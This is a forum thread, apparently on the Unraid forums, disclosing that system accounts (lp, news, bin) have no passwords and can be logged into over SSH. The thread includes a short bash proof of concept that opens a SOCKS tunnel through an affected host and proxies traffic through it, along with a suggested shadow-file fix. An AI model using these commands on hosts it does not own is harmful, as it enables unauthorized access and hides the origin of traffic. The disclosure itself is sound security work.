No passwords for system users - unraid can be used as a rogue ssh tunnel


Mihai

8 posts in this topic Last Reply

Recommended Posts

Hello guys,

 

I couldn't find any proper channels for announcing vulnerabilities, so i think this might be the best way to catch your attention. Apologies if there are proper channels, I did not have enough time to search for them.

 

Upon looking at some logs I noticed:

```sshd[28121]: Accepted none for lp from 194.61.26.34 port 26028 ssh2```

 

Then after i took a close look at /etc/shadow I noticed almost all users don't have passwords.

While they can't actually execute commands on the system, they can see information about the system:

```

$ ssh unraid -l news
Linux 4.19.107-Unraid.
Could not chdir to home directory /usr/lib/news: No such file or directory
Connection to unraid closed.

$

```

 

But most troublesome, and maybe you guys are not aware of this, but in order to open an ssh tunnel you don't need an actual shell.

 

```

$ ssh -D 3129 -f -C -q -N lp@unraid
$ netstat -plan | grep 3129
tcp        0      0 127.0.0.1:3129          0.0.0.0:*               LISTEN      1658854/ssh   

```

Voila! then you have an ssh tunnel opened.

For now I patched my box, but of course it won't survive the reboot.

 

An easy fix would be:

`sed -i -e 's/::1/:!!:1/g' /etc/shadow`

 

Cheerio,

Mihai

 

Link to post

Btw, here's a PoC in bash (anonymized the IPs a bit, hope you don't mind :P )

```

[root@taicasimaica ~]# curl -ks4 showip.net
124.122.71.51
[root@taicasimaica ~]# ssh -D 3129 -f -C -q -N bin@x.ninja -p 7127
The authenticity of host '[x.ninja]:7127 ([91.82.91.172]:7127)' can't be established.
ECDSA key fingerprint is SHA256:/Kg3rfHXB/0XIa2nW5UHOLAiipUztnhNDvxAyz91CP8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
[root@taicasimaica ~]# export http_proxy=socks5://127.0.0.1:3129
[root@taicasimaica ~]# curl -ks4 showip.net
91.82.91.172
[root@taicasimaica ~]#

```

Link to post
  • 3 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.